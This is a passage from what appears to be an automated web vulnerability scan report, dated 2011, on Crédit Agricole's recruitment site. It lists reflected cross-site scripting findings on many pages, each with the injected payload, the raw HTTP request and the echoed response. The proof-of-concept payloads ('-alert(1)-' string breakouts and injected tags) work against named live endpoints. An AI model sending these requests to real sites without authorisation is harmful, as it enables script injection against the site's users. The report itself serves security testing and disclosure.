var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.25. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_support.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf7de"><a>f1c96294668 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_support.php?bf7de"><a>f1c96294668=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Support
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_support.php?bf7de"><a>f1c96294668=1" />
...[SNIP]...

1.26. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /activities_careers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9a2"><a>c7afa9ee159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /activities_careers.php?dc9a2"><a>c7afa9ee159=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Activit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/activities_careers.php?dc9a2"><a>c7afa9ee159=1" />
...[SNIP]...

1.27. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /activities_careers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25941"-alert(1)-"9f171d652dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /activities_careers.php?25941"-alert(1)-"9f171d652dd=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Activit
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/activities_careers.php?25941"-alert(1)-"9f171d652dd=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.28. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /apply.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce76d"><a>629914ffb41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apply.php?ce76d"><a>629914ffb41=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Apply -
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/apply.php?ce76d"><a>629914ffb41=1" />
...[SNIP]...

1.29. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /apply.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a501"-alert(1)-"552fb4142e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apply.php?2a501"-alert(1)-"552fb4142e0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Apply -
...[SNIP]...
aringTitle = "Apply - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Apply - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/apply.php?2a501"-alert(1)-"552fb4142e0=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.30. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec44"><a>73fdf4dc79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup.php?1ec44"><a>73fdf4dc79d=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en/Sustainable-development/Acting-for-the-environment/Reducing-our-CO2-emissions-and-energy-consumption
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:01:42 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:01:42 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Content-Length: 52993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>About u
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup.php?1ec44"><a>73fdf4dc79d=1" />
...[SNIP]...

1.31. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e53"-alert(1)-"ec12183efc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup.php?c2e53"-alert(1)-"ec12183efc3=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en/Sustainable-development/Acting-for-the-environment/Reducing-our-CO2-emissions-and-energy-consumption
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:02:01 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:02:01 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Content-Length: 53014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>About u
...[SNIP]...
le = "About us - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup.php?c2e53"-alert(1)-"ec12183efc3=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.32. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_activities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7a68"-alert(1)-"592c2cce0a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup_activities.php?a7a68"-alert(1)-"592c2cce0a0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:54 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:54 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our act
...[SNIP]...
icole Recruitment Group";
var SharingBaseTitle = "Our activities - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup_activities.php?a7a68"-alert(1)-"592c2cce0a0=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.33. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_activities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c44"><a>b3a352f3f49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup_activities.php?38c44"><a>b3a352f3f49=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:28 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:28 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our act
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup_activities.php?38c44"><a>b3a352f3f49=1" />
...[SNIP]...

1.34. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dcde"><a>74495033bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup_key_figures.php?5dcde"><a>74495033bc1=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our key
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup_key_figures.php?5dcde"><a>74495033bc1=1" />
...[SNIP]...

1.35. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cd39"-alert(1)-"692f3c577f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup_key_figures.php?9cd39"-alert(1)-"692f3c577f1=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:42 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:42 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our key
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Our key figures - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup_key_figures.php?9cd39"-alert(1)-"692f3c577f1=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.36. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_locations.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299aa"><a>16646a432e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup_locations.php?299aa"><a>16646a432e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:22 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:22 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 51421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our loc
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup_locations.php?299aa"><a>16646a432e=1" />
...[SNIP]...

1.37. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_locations.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e26e8"-alert(1)-"9ea15a6e686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup_locations.php?e26e8"-alert(1)-"9ea15a6e686=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:41 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:41 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 51445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our loc
...[SNIP]...
gricole Recruitment Group";
var SharingBaseTitle = "Our locations - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup_locations.php?e26e8"-alert(1)-"9ea15a6e686=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.38. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disab_events.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d84b0"-alert(1)-"f90a72f441e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /divers_disab_events.php?d84b0"-alert(1)-"f90a72f441e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:53 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:53 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Events
...[SNIP]...
it Agricole Recruitment Group";
var SharingBaseTitle = "Events - Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/divers_disab_events.php?d84b0"-alert(1)-"f90a72f441e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.39. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disab_events.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb446"><a>45c1a10da8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /divers_disab_events.php?bb446"><a>45c1a10da8a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Events
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/divers_disab_events.php?bb446"><a>45c1a10da8a=1" />
...[SNIP]...

1.40. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disability.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 751d7"><a>c6825584c86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

